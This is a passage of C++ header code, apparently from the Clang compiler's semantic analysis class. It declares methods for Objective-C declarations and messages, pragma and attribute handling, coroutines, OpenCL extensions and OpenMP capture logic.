bool FindingInstantiatedContext = false);
DeclContext *FindInstantiatedContext(SourceLocation Loc, DeclContext *DC,
const MultiLevelTemplateArgumentList &TemplateArgs);
// Objective-C declarations.
enum ObjCContainerKind {
OCK_None = -1,
OCK_Interface = 0,
OCK_Protocol,
OCK_Category,
OCK_ClassExtension,
OCK_Implementation,
OCK_CategoryImplementation
};
ObjCContainerKind getObjCContainerKind() const;
DeclResult actOnObjCTypeParam(Scope *S,
ObjCTypeParamVariance variance,
SourceLocation varianceLoc,
unsigned index,
IdentifierInfo *paramName,
SourceLocation paramLoc,
SourceLocation colonLoc,
ParsedType typeBound);
ObjCTypeParamList *actOnObjCTypeParamList(Scope *S, SourceLocation lAngleLoc,
ArrayRef<Decl *> typeParams,
SourceLocation rAngleLoc);
void popObjCTypeParamList(Scope *S, ObjCTypeParamList *typeParamList);
Decl *ActOnStartClassInterface(
Scope *S, SourceLocation AtInterfaceLoc, IdentifierInfo *ClassName,
SourceLocation ClassLoc, ObjCTypeParamList *typeParamList,
IdentifierInfo *SuperName, SourceLocation SuperLoc,
ArrayRef<ParsedType> SuperTypeArgs, SourceRange SuperTypeArgsRange,
Decl *const *ProtoRefs, unsigned NumProtoRefs,
const SourceLocation *ProtoLocs, SourceLocation EndProtoLoc,
const ParsedAttributesView &AttrList);
void ActOnSuperClassOfClassInterface(Scope *S,
SourceLocation AtInterfaceLoc,
ObjCInterfaceDecl *IDecl,
IdentifierInfo *ClassName,
SourceLocation ClassLoc,
IdentifierInfo *SuperName,
SourceLocation SuperLoc,
ArrayRef<ParsedType> SuperTypeArgs,
SourceRange SuperTypeArgsRange);
void ActOnTypedefedProtocols(SmallVectorImpl<Decl *> &ProtocolRefs,
SmallVectorImpl<SourceLocation> &ProtocolLocs,
IdentifierInfo *SuperName,
SourceLocation SuperLoc);
Decl *ActOnCompatibilityAlias(
SourceLocation AtCompatibilityAliasLoc,
IdentifierInfo *AliasName, SourceLocation AliasLocation,
IdentifierInfo *ClassName, SourceLocation ClassLocation);
bool CheckForwardProtocolDeclarationForCircularDependency(
IdentifierInfo *PName,
SourceLocation &PLoc, SourceLocation PrevLoc,
const ObjCList<ObjCProtocolDecl> &PList);
Decl *ActOnStartProtocolInterface(
SourceLocation AtProtoInterfaceLoc, IdentifierInfo *ProtocolName,
SourceLocation ProtocolLoc, Decl *const *ProtoRefNames,
unsigned NumProtoRefs, const SourceLocation *ProtoLocs,
SourceLocation EndProtoLoc, const ParsedAttributesView &AttrList);
Decl *ActOnStartCategoryInterface(
SourceLocation AtInterfaceLoc, IdentifierInfo *ClassName,
SourceLocation ClassLoc, ObjCTypeParamList *typeParamList,
IdentifierInfo *CategoryName, SourceLocation CategoryLoc,
Decl *const *ProtoRefs, unsigned NumProtoRefs,
const SourceLocation *ProtoLocs, SourceLocation EndProtoLoc,
const ParsedAttributesView &AttrList);
Decl *ActOnStartClassImplementation(SourceLocation AtClassImplLoc,
IdentifierInfo *ClassName,
SourceLocation ClassLoc,
IdentifierInfo *SuperClassname,
SourceLocation SuperClassLoc,
const ParsedAttributesView &AttrList);
Decl *ActOnStartCategoryImplementation(SourceLocation AtCatImplLoc,
IdentifierInfo *ClassName,
SourceLocation ClassLoc,
IdentifierInfo *CatName,
SourceLocation CatLoc,
const ParsedAttributesView &AttrList);
DeclGroupPtrTy ActOnFinishObjCImplementation(Decl *ObjCImpDecl,
ArrayRef<Decl *> Decls);
DeclGroupPtrTy ActOnForwardClassDeclaration(SourceLocation Loc,
IdentifierInfo **IdentList,
SourceLocation *IdentLocs,
ArrayRef<ObjCTypeParamList *> TypeParamLists,
unsigned NumElts);
DeclGroupPtrTy
ActOnForwardProtocolDeclaration(SourceLocation AtProtoclLoc,
ArrayRef<IdentifierLocPair> IdentList,
const ParsedAttributesView &attrList);
void FindProtocolDeclaration(bool WarnOnDeclarations, bool ForObjCContainer,
ArrayRef<IdentifierLocPair> ProtocolId,
SmallVectorImpl<Decl *> &Protocols);
void DiagnoseTypeArgsAndProtocols(IdentifierInfo *ProtocolId,
SourceLocation ProtocolLoc,
IdentifierInfo *TypeArgId,
SourceLocation TypeArgLoc,
bool SelectProtocolFirst = false);
/// Given a list of identifiers (and their locations), resolve the
/// names to either Objective-C protocol qualifiers or type
/// arguments, as appropriate.
void actOnObjCTypeArgsOrProtocolQualifiers(
Scope *S,
ParsedType baseType,
SourceLocation lAngleLoc,
ArrayRef<IdentifierInfo *> identifiers,
ArrayRef<SourceLocation> identifierLocs,
SourceLocation rAngleLoc,
SourceLocation &typeArgsLAngleLoc,
SmallVectorImpl<ParsedType> &typeArgs,
SourceLocation &typeArgsRAngleLoc,
SourceLocation &protocolLAngleLoc,
SmallVectorImpl<Decl *> &protocols,
SourceLocation &protocolRAngleLoc,
bool warnOnIncompleteProtocols);
/// Build a an Objective-C protocol-qualified 'id' type where no
/// base type was specified.
TypeResult actOnObjCProtocolQualifierType(
SourceLocation lAngleLoc,
ArrayRef<Decl *> protocols,
ArrayRef<SourceLocation> protocolLocs,
SourceLocation rAngleLoc);
/// Build a specialized and/or protocol-qualified Objective-C type.
TypeResult actOnObjCTypeArgsAndProtocolQualifiers(
Scope *S,
SourceLocation Loc,
ParsedType BaseType,
SourceLocation TypeArgsLAngleLoc,
ArrayRef<ParsedType> TypeArgs,
SourceLocation TypeArgsRAngleLoc,
SourceLocation ProtocolLAngleLoc,
ArrayRef<Decl *> Protocols,
ArrayRef<SourceLocation> ProtocolLocs,
SourceLocation ProtocolRAngleLoc);
/// Build an Objective-C type parameter type.
QualType BuildObjCTypeParamType(const ObjCTypeParamDecl *Decl,
SourceLocation ProtocolLAngleLoc,
ArrayRef<ObjCProtocolDecl *> Protocols,
ArrayRef<SourceLocation> ProtocolLocs,
SourceLocation ProtocolRAngleLoc,
bool FailOnError = false);
/// Build an Objective-C object pointer type.
QualType BuildObjCObjectType(QualType BaseType,
SourceLocation Loc,
SourceLocation TypeArgsLAngleLoc,
ArrayRef<TypeSourceInfo *> TypeArgs,
SourceLocation TypeArgsRAngleLoc,
SourceLocation ProtocolLAngleLoc,
ArrayRef<ObjCProtocolDecl *> Protocols,
ArrayRef<SourceLocation> ProtocolLocs,
SourceLocation ProtocolRAngleLoc,
bool FailOnError = false);
/// Ensure attributes are consistent with type.
/// \param [in, out] Attributes The attributes to check; they will
/// be modified to be consistent with \p PropertyTy.
void CheckObjCPropertyAttributes(Decl *PropertyPtrTy,
SourceLocation Loc,
unsigned &Attributes,
bool propertyInPrimaryClass);
/// Process the specified property declaration and create decls for the
/// setters and getters as needed.
/// \param property The property declaration being processed
void ProcessPropertyDecl(ObjCPropertyDecl *property);
void DiagnosePropertyMismatch(ObjCPropertyDecl *Property,
ObjCPropertyDecl *SuperProperty,
const IdentifierInfo *Name,
bool OverridingProtocolProperty);
void DiagnoseClassExtensionDupMethods(ObjCCategoryDecl *CAT,
ObjCInterfaceDecl *ID);
Decl *ActOnAtEnd(Scope *S, SourceRange AtEnd,
ArrayRef<Decl *> allMethods = None,
ArrayRef<DeclGroupPtrTy> allTUVars = None);
Decl *ActOnProperty(Scope *S, SourceLocation AtLoc,
SourceLocation LParenLoc,
FieldDeclarator &FD, ObjCDeclSpec &ODS,
Selector GetterSel, Selector SetterSel,
tok::ObjCKeywordKind MethodImplKind,
DeclContext *lexicalDC = nullptr);
Decl *ActOnPropertyImplDecl(Scope *S,
SourceLocation AtLoc,
SourceLocation PropertyLoc,
bool ImplKind,
IdentifierInfo *PropertyId,
IdentifierInfo *PropertyIvar,
SourceLocation PropertyIvarLoc,
ObjCPropertyQueryKind QueryKind);
enum ObjCSpecialMethodKind {
OSMK_None,
OSMK_Alloc,
OSMK_New,
OSMK_Copy,
OSMK_RetainingInit,
OSMK_NonRetainingInit
};
struct ObjCArgInfo {
IdentifierInfo *Name;
SourceLocation NameLoc;
// The Type is null if no type was specified, and the DeclSpec is invalid
// in this case.
ParsedType Type;
ObjCDeclSpec DeclSpec;
/// ArgAttrs - Attribute list for this argument.
ParsedAttributesView ArgAttrs;
};
Decl *ActOnMethodDeclaration(
Scope *S,
SourceLocation BeginLoc, // location of the + or -.
SourceLocation EndLoc, // location of the ; or {.
tok::TokenKind MethodType, ObjCDeclSpec &ReturnQT, ParsedType ReturnType,
ArrayRef<SourceLocation> SelectorLocs, Selector Sel,
// optional arguments. The number of types/arguments is obtained
// from the Sel.getNumArgs().
ObjCArgInfo *ArgInfo, DeclaratorChunk::ParamInfo *CParamInfo,
unsigned CNumArgs, // c-style args
const ParsedAttributesView &AttrList, tok::ObjCKeywordKind MethodImplKind,
bool isVariadic, bool MethodDefinition);
ObjCMethodDecl *LookupMethodInQualifiedType(Selector Sel,
const ObjCObjectPointerType *OPT,
bool IsInstance);
ObjCMethodDecl *LookupMethodInObjectType(Selector Sel, QualType Ty,
bool IsInstance);
bool CheckARCMethodDecl(ObjCMethodDecl *method);
bool inferObjCARCLifetime(ValueDecl *decl);
void deduceOpenCLAddressSpace(ValueDecl *decl);
ExprResult
HandleExprPropertyRefExpr(const ObjCObjectPointerType *OPT,
Expr *BaseExpr,
SourceLocation OpLoc,
DeclarationName MemberName,
SourceLocation MemberLoc,
SourceLocation SuperLoc, QualType SuperType,
bool Super);
ExprResult
ActOnClassPropertyRefExpr(IdentifierInfo &receiverName,
IdentifierInfo &propertyName,
SourceLocation receiverNameLoc,
SourceLocation propertyNameLoc);
ObjCMethodDecl *tryCaptureObjCSelf(SourceLocation Loc);
/// Describes the kind of message expression indicated by a message
/// send that starts with an identifier.
enum ObjCMessageKind {
/// The message is sent to 'super'.
ObjCSuperMessage,
/// The message is an instance message.
ObjCInstanceMessage,
/// The message is a class message, and the identifier is a type
/// name.
ObjCClassMessage
};
ObjCMessageKind getObjCMessageKind(Scope *S,
IdentifierInfo *Name,
SourceLocation NameLoc,
bool IsSuper,
bool HasTrailingDot,
ParsedType &ReceiverType);
ExprResult ActOnSuperMessage(Scope *S, SourceLocation SuperLoc,
Selector Sel,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args);
ExprResult BuildClassMessage(TypeSourceInfo *ReceiverTypeInfo,
QualType ReceiverType,
SourceLocation SuperLoc,
Selector Sel,
ObjCMethodDecl *Method,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args,
bool isImplicit = false);
ExprResult BuildClassMessageImplicit(QualType ReceiverType,
bool isSuperReceiver,
SourceLocation Loc,
Selector Sel,
ObjCMethodDecl *Method,
MultiExprArg Args);
ExprResult ActOnClassMessage(Scope *S,
ParsedType Receiver,
Selector Sel,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args);
ExprResult BuildInstanceMessage(Expr *Receiver,
QualType ReceiverType,
SourceLocation SuperLoc,
Selector Sel,
ObjCMethodDecl *Method,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args,
bool isImplicit = false);
ExprResult BuildInstanceMessageImplicit(Expr *Receiver,
QualType ReceiverType,
SourceLocation Loc,
Selector Sel,
ObjCMethodDecl *Method,
MultiExprArg Args);
ExprResult ActOnInstanceMessage(Scope *S,
Expr *Receiver,
Selector Sel,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args);
ExprResult BuildObjCBridgedCast(SourceLocation LParenLoc,
ObjCBridgeCastKind Kind,
SourceLocation BridgeKeywordLoc,
TypeSourceInfo *TSInfo,
Expr *SubExpr);
ExprResult ActOnObjCBridgedCast(Scope *S,
SourceLocation LParenLoc,
ObjCBridgeCastKind Kind,
SourceLocation BridgeKeywordLoc,
ParsedType Type,
SourceLocation RParenLoc,
Expr *SubExpr);
void CheckTollFreeBridgeCast(QualType castType, Expr *castExpr);
void CheckObjCBridgeRelatedCast(QualType castType, Expr *castExpr);
bool CheckTollFreeBridgeStaticCast(QualType castType, Expr *castExpr,
CastKind &Kind);
bool checkObjCBridgeRelatedComponents(SourceLocation Loc,
QualType DestType, QualType SrcType,
ObjCInterfaceDecl *&RelatedClass,
ObjCMethodDecl *&ClassMethod,
ObjCMethodDecl *&InstanceMethod,
TypedefNameDecl *&TDNDecl,
bool CfToNs, bool Diagnose = true);
bool CheckObjCBridgeRelatedConversions(SourceLocation Loc,
QualType DestType, QualType SrcType,
Expr *&SrcExpr, bool Diagnose = true);
bool ConversionToObjCStringLiteralCheck(QualType DstType, Expr *&SrcExpr,
bool Diagnose = true);
bool checkInitMethod(ObjCMethodDecl *method, QualType receiverTypeIfCall);
/// Check whether the given new method is a valid override of the
/// given overridden method, and set any properties that should be inherited.
void CheckObjCMethodOverride(ObjCMethodDecl *NewMethod,
const ObjCMethodDecl *Overridden);
/// Describes the compatibility of a result type with its method.
enum ResultTypeCompatibilityKind {
RTC_Compatible,
RTC_Incompatible,
RTC_Unknown
};
/// Check whether the declared result type of the given Objective-C
/// method declaration is compatible with the method's class.
ResultTypeCompatibilityKind
checkRelatedResultTypeCompatibility(const ObjCMethodDecl *Method,
const ObjCInterfaceDecl *CurrentClass);
void CheckObjCMethodDirectOverrides(ObjCMethodDecl *method,
ObjCMethodDecl *overridden);
void CheckObjCMethodOverrides(ObjCMethodDecl *ObjCMethod,
ObjCInterfaceDecl *CurrentClass,
ResultTypeCompatibilityKind RTC);
enum PragmaOptionsAlignKind {
POAK_Native, // #pragma options align=native
POAK_Natural, // #pragma options align=natural
POAK_Packed, // #pragma options align=packed
POAK_Power, // #pragma options align=power
POAK_Mac68k, // #pragma options align=mac68k
POAK_Reset // #pragma options align=reset
};
/// ActOnPragmaClangSection - Called on well formed \#pragma clang section
void ActOnPragmaClangSection(SourceLocation PragmaLoc,
PragmaClangSectionAction Action,
PragmaClangSectionKind SecKind, StringRef SecName);
/// ActOnPragmaOptionsAlign - Called on well formed \#pragma options align.
void ActOnPragmaOptionsAlign(PragmaOptionsAlignKind Kind,
SourceLocation PragmaLoc);
/// ActOnPragmaPack - Called on well formed \#pragma pack(...).
void ActOnPragmaPack(SourceLocation PragmaLoc, PragmaMsStackAction Action,
StringRef SlotLabel, Expr *Alignment);
enum class PragmaPackDiagnoseKind {
NonDefaultStateAtInclude,
ChangedStateAtExit
};
void DiagnoseNonDefaultPragmaPack(PragmaPackDiagnoseKind Kind,
SourceLocation IncludeLoc);
void DiagnoseUnterminatedPragmaPack();
/// ActOnPragmaMSStruct - Called on well formed \#pragma ms_struct [on|off].
void ActOnPragmaMSStruct(PragmaMSStructKind Kind);
/// ActOnPragmaMSComment - Called on well formed
/// \#pragma comment(kind, "arg").
void ActOnPragmaMSComment(SourceLocation CommentLoc, PragmaMSCommentKind Kind,
StringRef Arg);
/// ActOnPragmaMSPointersToMembers - called on well formed \#pragma
/// pointers_to_members(representation method[, general purpose
/// representation]).
void ActOnPragmaMSPointersToMembers(
LangOptions::PragmaMSPointersToMembersKind Kind,
SourceLocation PragmaLoc);
/// Called on well formed \#pragma vtordisp().
void ActOnPragmaMSVtorDisp(PragmaMsStackAction Action,
SourceLocation PragmaLoc,
MSVtorDispMode Value);
enum PragmaSectionKind {
PSK_DataSeg,
PSK_BSSSeg,
PSK_ConstSeg,
PSK_CodeSeg,
};
bool UnifySection(StringRef SectionName,
int SectionFlags,
DeclaratorDecl *TheDecl);
bool UnifySection(StringRef SectionName,
int SectionFlags,
SourceLocation PragmaSectionLocation);
/// Called on well formed \#pragma bss_seg/data_seg/const_seg/code_seg.
void ActOnPragmaMSSeg(SourceLocation PragmaLocation,
PragmaMsStackAction Action,
llvm::StringRef StackSlotLabel,
StringLiteral *SegmentName,
llvm::StringRef PragmaName);
/// Called on well formed \#pragma section().
void ActOnPragmaMSSection(SourceLocation PragmaLocation,
int SectionFlags, StringLiteral *SegmentName);
/// Called on well-formed \#pragma init_seg().
void ActOnPragmaMSInitSeg(SourceLocation PragmaLocation,
StringLiteral *SegmentName);
/// Called on #pragma clang __debug dump II
void ActOnPragmaDump(Scope *S, SourceLocation Loc, IdentifierInfo *II);
/// ActOnPragmaDetectMismatch - Call on well-formed \#pragma detect_mismatch
void ActOnPragmaDetectMismatch(SourceLocation Loc, StringRef Name,
StringRef Value);
/// ActOnPragmaUnused - Called on well-formed '\#pragma unused'.
void ActOnPragmaUnused(const Token &Identifier,
Scope *curScope,
SourceLocation PragmaLoc);
/// ActOnPragmaVisibility - Called on well formed \#pragma GCC visibility... .
void ActOnPragmaVisibility(const IdentifierInfo* VisType,
SourceLocation PragmaLoc);
NamedDecl *DeclClonePragmaWeak(NamedDecl *ND, IdentifierInfo *II,
SourceLocation Loc);
void DeclApplyPragmaWeak(Scope *S, NamedDecl *ND, WeakInfo &W);
/// ActOnPragmaWeakID - Called on well formed \#pragma weak ident.
void ActOnPragmaWeakID(IdentifierInfo* WeakName,
SourceLocation PragmaLoc,
SourceLocation WeakNameLoc);
/// ActOnPragmaRedefineExtname - Called on well formed
/// \#pragma redefine_extname oldname newname.
void ActOnPragmaRedefineExtname(IdentifierInfo* WeakName,
IdentifierInfo* AliasName,
SourceLocation PragmaLoc,
SourceLocation WeakNameLoc,
SourceLocation AliasNameLoc);
/// ActOnPragmaWeakAlias - Called on well formed \#pragma weak ident = ident.
void ActOnPragmaWeakAlias(IdentifierInfo* WeakName,
IdentifierInfo* AliasName,
SourceLocation PragmaLoc,
SourceLocation WeakNameLoc,
SourceLocation AliasNameLoc);
/// ActOnPragmaFPContract - Called on well formed
/// \#pragma {STDC,OPENCL} FP_CONTRACT and
/// \#pragma clang fp contract
void ActOnPragmaFPContract(LangOptions::FPContractModeKind FPC);
/// ActOnPragmaFenvAccess - Called on well formed
/// \#pragma STDC FENV_ACCESS
void ActOnPragmaFEnvAccess(LangOptions::FEnvAccessModeKind FPC);
/// AddAlignmentAttributesForRecord - Adds any needed alignment attributes to
/// a the record decl, to handle '\#pragma pack' and '\#pragma options align'.
void AddAlignmentAttributesForRecord(RecordDecl *RD);
/// AddMsStructLayoutForRecord - Adds ms_struct layout attribute to record.
void AddMsStructLayoutForRecord(RecordDecl *RD);
/// FreePackedContext - Deallocate and null out PackContext.
void FreePackedContext();
/// PushNamespaceVisibilityAttr - Note that we've entered a
/// namespace with a visibility attribute.
void PushNamespaceVisibilityAttr(const VisibilityAttr *Attr,
SourceLocation Loc);
/// AddPushedVisibilityAttribute - If '\#pragma GCC visibility' was used,
/// add an appropriate visibility attribute.
void AddPushedVisibilityAttribute(Decl *RD);
/// PopPragmaVisibility - Pop the top element of the visibility stack; used
/// for '\#pragma GCC visibility' and visibility attributes on namespaces.
void PopPragmaVisibility(bool IsNamespaceEnd, SourceLocation EndLoc);
/// FreeVisContext - Deallocate and null out VisContext.
void FreeVisContext();
/// AddCFAuditedAttribute - Check whether we're currently within
/// '\#pragma clang arc_cf_code_audited' and, if so, consider adding
/// the appropriate attribute.
void AddCFAuditedAttribute(Decl *D);
void ActOnPragmaAttributeAttribute(ParsedAttr &Attribute,
SourceLocation PragmaLoc,
attr::ParsedSubjectMatchRuleSet Rules);
void ActOnPragmaAttributeEmptyPush(SourceLocation PragmaLoc,
const IdentifierInfo *Namespace);
/// Called on well-formed '\#pragma clang attribute pop'.
void ActOnPragmaAttributePop(SourceLocation PragmaLoc,
const IdentifierInfo *Namespace);
/// Adds the attributes that have been specified using the
/// '\#pragma clang attribute push' directives to the given declaration.
void AddPragmaAttributes(Scope *S, Decl *D);
void DiagnoseUnterminatedPragmaAttribute();
/// Called on well formed \#pragma clang optimize.
void ActOnPragmaOptimize(bool On, SourceLocation PragmaLoc);
/// Get the location for the currently active "\#pragma clang optimize
/// off". If this location is invalid, then the state of the pragma is "on".
SourceLocation getOptimizeOffPragmaLocation() const {
return OptimizeOffPragmaLocation;
}
/// Only called on function definitions; if there is a pragma in scope
/// with the effect of a range-based optnone, consider marking the function
/// with attribute optnone.
void AddRangeBasedOptnone(FunctionDecl *FD);
/// Adds the 'optnone' attribute to the function declaration if there
/// are no conflicts; Loc represents the location causing the 'optnone'
/// attribute to be added (usually because of a pragma).
void AddOptnoneAttributeIfNoConflicts(FunctionDecl *FD, SourceLocation Loc);
/// AddAlignedAttr - Adds an aligned attribute to a particular declaration.
void AddAlignedAttr(Decl *D, const AttributeCommonInfo &CI, Expr *E,
bool IsPackExpansion);
void AddAlignedAttr(Decl *D, const AttributeCommonInfo &CI, TypeSourceInfo *T,
bool IsPackExpansion);
/// AddAssumeAlignedAttr - Adds an assume_aligned attribute to a particular
/// declaration.
void AddAssumeAlignedAttr(Decl *D, const AttributeCommonInfo &CI, Expr *E,
Expr *OE);
/// AddAllocAlignAttr - Adds an alloc_align attribute to a particular
/// declaration.
void AddAllocAlignAttr(Decl *D, const AttributeCommonInfo &CI,
Expr *ParamExpr);
/// AddAlignValueAttr - Adds an align_value attribute to a particular
/// declaration.
void AddAlignValueAttr(Decl *D, const AttributeCommonInfo &CI, Expr *E);
/// AddLaunchBoundsAttr - Adds a launch_bounds attribute to a particular
/// declaration.
void AddLaunchBoundsAttr(Decl *D, const AttributeCommonInfo &CI,
Expr *MaxThreads, Expr *MinBlocks);
/// AddModeAttr - Adds a mode attribute to a particular declaration.
void AddModeAttr(Decl *D, const AttributeCommonInfo &CI, IdentifierInfo *Name,
bool InInstantiation = false);
void AddParameterABIAttr(Decl *D, const AttributeCommonInfo &CI,
ParameterABI ABI);
enum class RetainOwnershipKind {NS, CF, OS};
void AddXConsumedAttr(Decl *D, const AttributeCommonInfo &CI,
RetainOwnershipKind K, bool IsTemplateInstantiation);
/// addAMDGPUFlatWorkGroupSizeAttr - Adds an amdgpu_flat_work_group_size
/// attribute to a particular declaration.
void addAMDGPUFlatWorkGroupSizeAttr(Decl *D, const AttributeCommonInfo &CI,
Expr *Min, Expr *Max);
/// addAMDGPUWavePersEUAttr - Adds an amdgpu_waves_per_eu attribute to a
/// particular declaration.
void addAMDGPUWavesPerEUAttr(Decl *D, const AttributeCommonInfo &CI,
Expr *Min, Expr *Max);
bool checkNSReturnsRetainedReturnType(SourceLocation loc, QualType type);
//===--------------------------------------------------------------------===//
// C++ Coroutines TS
//
bool ActOnCoroutineBodyStart(Scope *S, SourceLocation KwLoc,
StringRef Keyword);
ExprResult ActOnCoawaitExpr(Scope *S, SourceLocation KwLoc, Expr *E);
ExprResult ActOnCoyieldExpr(Scope *S, SourceLocation KwLoc, Expr *E);
StmtResult ActOnCoreturnStmt(Scope *S, SourceLocation KwLoc, Expr *E);
ExprResult BuildResolvedCoawaitExpr(SourceLocation KwLoc, Expr *E,
bool IsImplicit = false);
ExprResult BuildUnresolvedCoawaitExpr(SourceLocation KwLoc, Expr *E,
UnresolvedLookupExpr* Lookup);
ExprResult BuildCoyieldExpr(SourceLocation KwLoc, Expr *E);
StmtResult BuildCoreturnStmt(SourceLocation KwLoc, Expr *E,
bool IsImplicit = false);
StmtResult BuildCoroutineBodyStmt(CoroutineBodyStmt::CtorArgs);
bool buildCoroutineParameterMoves(SourceLocation Loc);
VarDecl *buildCoroutinePromise(SourceLocation Loc);
void CheckCompletedCoroutineBody(FunctionDecl *FD, Stmt *&Body);
ClassTemplateDecl *lookupCoroutineTraits(SourceLocation KwLoc,
SourceLocation FuncLoc);
//===--------------------------------------------------------------------===//
// OpenCL extensions.
//
private:
std::string CurrOpenCLExtension;
/// Extensions required by an OpenCL type.
llvm::DenseMap<const Type*, std::set<std::string>> OpenCLTypeExtMap;
/// Extensions required by an OpenCL declaration.
llvm::DenseMap<const Decl*, std::set<std::string>> OpenCLDeclExtMap;
public:
llvm::StringRef getCurrentOpenCLExtension() const {
return CurrOpenCLExtension;
}
/// Check if a function declaration \p FD associates with any
/// extensions present in OpenCLDeclExtMap and if so return the
/// extension(s) name(s).
std::string getOpenCLExtensionsFromDeclExtMap(FunctionDecl *FD);
/// Check if a function type \p FT associates with any
/// extensions present in OpenCLTypeExtMap and if so return the
/// extension(s) name(s).
std::string getOpenCLExtensionsFromTypeExtMap(FunctionType *FT);
/// Find an extension in an appropriate extension map and return its name
template<typename T, typename MapT>
std::string getOpenCLExtensionsFromExtMap(T* FT, MapT &Map);
void setCurrentOpenCLExtension(llvm::StringRef Ext) {
CurrOpenCLExtension = Ext;
}
/// Set OpenCL extensions for a type which can only be used when these
/// OpenCL extensions are enabled. If \p Exts is empty, do nothing.
/// \param Exts A space separated list of OpenCL extensions.
void setOpenCLExtensionForType(QualType T, llvm::StringRef Exts);
/// Set OpenCL extensions for a declaration which can only be
/// used when these OpenCL extensions are enabled. If \p Exts is empty, do
/// nothing.
/// \param Exts A space separated list of OpenCL extensions.
void setOpenCLExtensionForDecl(Decl *FD, llvm::StringRef Exts);
/// Set current OpenCL extensions for a type which can only be used
/// when these OpenCL extensions are enabled. If current OpenCL extension is
/// empty, do nothing.
void setCurrentOpenCLExtensionForType(QualType T);
/// Set current OpenCL extensions for a declaration which
/// can only be used when these OpenCL extensions are enabled. If current
/// OpenCL extension is empty, do nothing.
void setCurrentOpenCLExtensionForDecl(Decl *FD);
bool isOpenCLDisabledDecl(Decl *FD);
/// Check if type \p T corresponding to declaration specifier \p DS
/// is disabled due to required OpenCL extensions being disabled. If so,
/// emit diagnostics.
/// \return true if type is disabled.
bool checkOpenCLDisabledTypeDeclSpec(const DeclSpec &DS, QualType T);
/// Check if declaration \p D used by expression \p E
/// is disabled due to required OpenCL extensions being disabled. If so,
/// emit diagnostics.
/// \return true if type is disabled.
bool checkOpenCLDisabledDecl(const NamedDecl &D, const Expr &E);
//===--------------------------------------------------------------------===//
// OpenMP directives and clauses.
//
private:
void *VarDataSharingAttributesStack;
/// Number of nested '#pragma omp declare target' directives.
unsigned DeclareTargetNestingLevel = 0;
/// Initialization of data-sharing attributes stack.
void InitDataSharingAttributesStack();
void DestroyDataSharingAttributesStack();
ExprResult
VerifyPositiveIntegerConstantInClause(Expr *Op, OpenMPClauseKind CKind,
bool StrictlyPositive = true);
/// Returns OpenMP nesting level for current directive.
unsigned getOpenMPNestingLevel() const;
/// Adjusts the function scopes index for the target-based regions.
void adjustOpenMPTargetScopeIndex(unsigned &FunctionScopesIndex,
unsigned Level) const;
/// Returns the number of scopes associated with the construct on the given
/// OpenMP level.
int getNumberOfConstructScopes(unsigned Level) const;
/// Push new OpenMP function region for non-capturing function.
void pushOpenMPFunctionRegion();
/// Pop OpenMP function region for non-capturing function.
void popOpenMPFunctionRegion(const sema::FunctionScopeInfo *OldFSI);
/// Check whether we're allowed to call Callee from the current function.
void checkOpenMPDeviceFunction(SourceLocation Loc, FunctionDecl *Callee,
bool CheckForDelayedContext = true);
/// Check whether we're allowed to call Callee from the current function.
void checkOpenMPHostFunction(SourceLocation Loc, FunctionDecl *Callee,
bool CheckCaller = true);
/// Check if the expression is allowed to be used in expressions for the
/// OpenMP devices.
void checkOpenMPDeviceExpr(const Expr *E);
/// Finishes analysis of the deferred functions calls that may be declared as
/// host/nohost during device/host compilation.
void finalizeOpenMPDelayedAnalysis();
/// Checks if a type or a declaration is disabled due to the owning extension
/// being disabled, and emits diagnostic messages if it is disabled.
/// \param D type or declaration to be checked.
/// \param DiagLoc source location for the diagnostic message.
/// \param DiagInfo information to be emitted for the diagnostic message.
/// \param SrcRange source range of the declaration.
/// \param Map maps type or declaration to the extensions.
/// \param Selector selects diagnostic message: 0 for type and 1 for
/// declaration.
/// \return true if the type or declaration is disabled.
template <typename T, typename DiagLocT, typename DiagInfoT, typename MapT>
bool checkOpenCLDisabledTypeOrDecl(T D, DiagLocT DiagLoc, DiagInfoT DiagInfo,
MapT &Map, unsigned Selector = 0,
SourceRange SrcRange = SourceRange());
/// Marks all the functions that might be required for the currently active
/// OpenMP context.
void markOpenMPDeclareVariantFuncsReferenced(SourceLocation Loc,
FunctionDecl *Func,
bool MightBeOdrUse);
public:
/// Struct to store the context selectors info for declare variant directive.
using OMPCtxStringType = SmallString<8>;
using OMPCtxSelectorData =
OpenMPCtxSelectorData<SmallVector<OMPCtxStringType, 4>, ExprResult>;
/// Checks if the variant/multiversion functions are compatible.
bool areMultiversionVariantFunctionsCompatible(
const FunctionDecl *OldFD, const FunctionDecl *NewFD,
const PartialDiagnostic &NoProtoDiagID,
const PartialDiagnosticAt &NoteCausedDiagIDAt,
const PartialDiagnosticAt &NoSupportDiagIDAt,
const PartialDiagnosticAt &DiffDiagIDAt, bool TemplatesSupported,
bool ConstexprSupported, bool CLinkageMayDiffer);
/// Function tries to capture lambda's captured variables in the OpenMP region
/// before the original lambda is captured.
void tryCaptureOpenMPLambdas(ValueDecl *V);
/// Return true if the provided declaration \a VD should be captured by
/// reference.
/// \param Level Relative level of nested OpenMP construct for that the check
/// is performed.
/// \param OpenMPCaptureLevel Capture level within an OpenMP construct.
bool isOpenMPCapturedByRef(const ValueDecl *D, unsigned Level,
unsigned OpenMPCaptureLevel) const;
/// Check if the specified variable is used in one of the private
/// clauses (private, firstprivate, lastprivate, reduction etc.) in OpenMP
/// constructs.
VarDecl *isOpenMPCapturedDecl(ValueDecl *D, bool CheckScopeInfo = false,
unsigned StopAt = 0);
ExprResult getOpenMPCapturedExpr(VarDecl *Capture, ExprValueKind VK,
ExprObjectKind OK, SourceLocation Loc);
/// If the current region is a loop-based region, mark the start of the loop
/// construct.
void startOpenMPLoop();
/// If the current region is a range loop-based region, mark the start of the
/// loop construct.
void startOpenMPCXXRangeFor();
/// Check if the specified variable is used in 'private' clause.
/// \param Level Relative level of nested OpenMP construct for that the check
/// is performed.
bool isOpenMPPrivateDecl(const ValueDecl *D, unsigned Level) const;
/// Sets OpenMP capture kind (OMPC_private, OMPC_firstprivate, OMPC_map etc.)
